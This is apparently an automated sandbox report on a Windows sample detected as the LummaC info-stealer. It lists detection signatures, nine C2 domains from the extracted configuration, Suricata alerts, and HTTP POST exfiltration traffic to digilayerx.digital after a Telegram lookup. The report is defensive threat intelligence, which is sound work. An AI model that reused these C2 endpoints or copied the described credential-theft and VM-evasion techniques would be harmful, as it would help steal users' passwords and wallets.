Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe
Analysis ID:	1673872
MD5:	1b88c863822e876c446546c9de795f6a
SHA1:	1f671531ff994f929e2c8d372212b319ec71ea1b
SHA256:	0b412e85f994c1389867c8626819145c2da151b0f405e2d13707c2a66cbd974d
Tags:	exeuser-SecuriteInfoCom
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

PE file has nameless sections

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to steal from password manager

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Detected potential crypto function

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe (PID: 7972 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe" MD5: 1B88C863822E876C446546C9DE795F6A)

cleanup

Malware Configuration

Threatname: LummaC

{
  "C2 url": [
    "porcupineq.digital/gsoz",
    "piratetwrath.run/ytus",
    "changeaie.top/geps",
    "quilltayle.live/gksi",
    "liftally.top/xasj",
    "nighetwhisper.top/lekd",
    "salaccgfa.top/gsooz",
    "zestmodp.top/zeda",
    "starofliught.top/wozd"
  ],
  "Build id": "7C8E35D6395A868D3DD3008F84DB34FA"
}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1409033013.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe PID: 7972	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe PID: 7972	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-25T08:55:18.557531+0200	2028371	3	Unknown Traffic	192.168.2.5	49689	149.154.167.99	443	TCP
2025-04-25T08:55:19.758133+0200	2028371	3	Unknown Traffic	192.168.2.5	49690	172.67.146.208	443	TCP
2025-04-25T08:55:21.741411+0200	2028371	3	Unknown Traffic	192.168.2.5	49691	172.67.146.208	443	TCP
2025-04-25T08:55:23.893013+0200	2028371	3	Unknown Traffic	192.168.2.5	49695	172.67.146.208	443	TCP
2025-04-25T08:55:25.520213+0200	2028371	3	Unknown Traffic	192.168.2.5	49696	172.67.146.208	443	TCP
2025-04-25T08:55:28.097754+0200	2028371	3	Unknown Traffic	192.168.2.5	49697	172.67.146.208	443	TCP
2025-04-25T08:55:29.454756+0200	2028371	3	Unknown Traffic	192.168.2.5	49698	172.67.146.208	443	TCP
2025-04-25T08:55:32.189050+0200	2028371	3	Unknown Traffic	192.168.2.5	49699	172.67.146.208	443	TCP

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://digilayerx.digital:443/hmand	Avira URL Cloud: Label: malware
Source: porcupineq.digital/gsoz	Avira URL Cloud: Label: malware
Source: https://digilayerx.digital/hmand#	Avira URL Cloud: Label: malware
Source: https://digilayerx.digital/hmand	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["porcupineq.digital/gsoz", "piratetwrath.run/ytus", "changeaie.top/geps", "quilltayle.live/gksi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "starofliught.top/wozd"], "Build id": "7C8E35D6395A868D3DD3008F84DB34FA"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Virustotal: Detection: 76%			Perma Link
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	ReversingLabs: Detection: 88%

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: porcupineq.digital/gsoz
Source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: piratetwrath.run/ytus
Source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: changeaie.top/geps
Source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: quilltayle.live/gksi
Source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: liftally.top/xasj
Source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: nighetwhisper.top/lekd
Source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: salaccgfa.top/gsooz
Source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: zestmodp.top/zeda
Source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: starofliught.top/wozd

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49699 version: TLS 1.2

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: porcupineq.digital/gsoz
Source: Malware configuration extractor	URLs: piratetwrath.run/ytus
Source: Malware configuration extractor	URLs: changeaie.top/geps
Source: Malware configuration extractor	URLs: quilltayle.live/gksi
Source: Malware configuration extractor	URLs: liftally.top/xasj
Source: Malware configuration extractor	URLs: nighetwhisper.top/lekd
Source: Malware configuration extractor	URLs: salaccgfa.top/gsooz
Source: Malware configuration extractor	URLs: zestmodp.top/zeda
Source: Malware configuration extractor	URLs: starofliught.top/wozd

Source: global traffic

HTTP traffic detected: GET /wermnjgk34 HTTP/1.1Connection: Keep-AliveHost: t.me

Source: Joe Sandbox View	IP Address: 172.67.146.208 172.67.146.208
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49689 -> 149.154.167.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49697 -> 172.67.146.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49691 -> 172.67.146.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49699 -> 172.67.146.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49696 -> 172.67.146.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49698 -> 172.67.146.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49695 -> 172.67.146.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49690 -> 172.67.146.208:443

Source: global traffic	HTTP traffic detected: POST /hmand HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 45Host: digilayerx.digital
Source: global traffic	HTTP traffic detected: POST /hmand HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MEbMSIjUffSUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14887Host: digilayerx.digital
Source: global traffic	HTTP traffic detected: POST /hmand HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=hQvp09IzSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15021Host: digilayerx.digital
Source: global traffic	HTTP traffic detected: POST /hmand HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=19Yr3f4rd19AxSnEItxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20560Host: digilayerx.digital
Source: global traffic	HTTP traffic detected: POST /hmand HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GS604I6rSWhdj4xGM5IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2401Host: digilayerx.digital
Source: global traffic	HTTP traffic detected: POST /hmand HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0ttOGt3jSY6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 589138Host: digilayerx.digital
Source: global traffic	HTTP traffic detected: POST /hmand HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 83Host: digilayerx.digital

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /wermnjgk34 HTTP/1.1Connection: Keep-AliveHost: t.me

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: digilayerx.digital

Source: unknown

HTTP traffic detected: POST /hmand HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 45Host: digilayerx.digital

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1407265814.0000000000A3D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.enigmaprotector.com/
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1407265814.0000000000A3D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.enigmaprotector.com/openU
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406509269.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1325815469.000000000101E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1365920545.0000000001025000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digilayerx.digital/
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1373503974.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1408224347.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406509269.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1365920545.0000000001025000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digilayerx.digital/X
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1373503974.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1408224347.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406509269.0000000001028000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digilayerx.digital/h
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1408190345.000000000101E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1373580548.0000000000FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1373503974.000000000100E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1343228241.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digilayerx.digital/hmand
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1325815469.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digilayerx.digital/hmand#
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1365920545.0000000001032000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406765317.0000000001037000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406509269.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1365953673.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1325815469.0000000001032000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1355256191.0000000001032000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1343228241.0000000001032000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1408275091.0000000001038000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1373503974.0000000001032000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digilayerx.digital/hmandl
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406643320.000000000101E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1408190345.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digilayerx.digital/hmandn?
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1373503974.000000000103D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digilayerx.digital:443/hmand
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1329735693.000000000402A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1329735693.000000000402A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1270220814.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1270220814.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1270139049.0000000001006000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/wermnjgk34
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1343228241.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1270220814.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=af0686121de0562840_555246021998
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1270220814.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1329735693.000000000402A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1329735693.000000000402A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1329735693.000000000402A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1329735693.000000000402A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1329735693.000000000402A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1329735693.000000000402A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
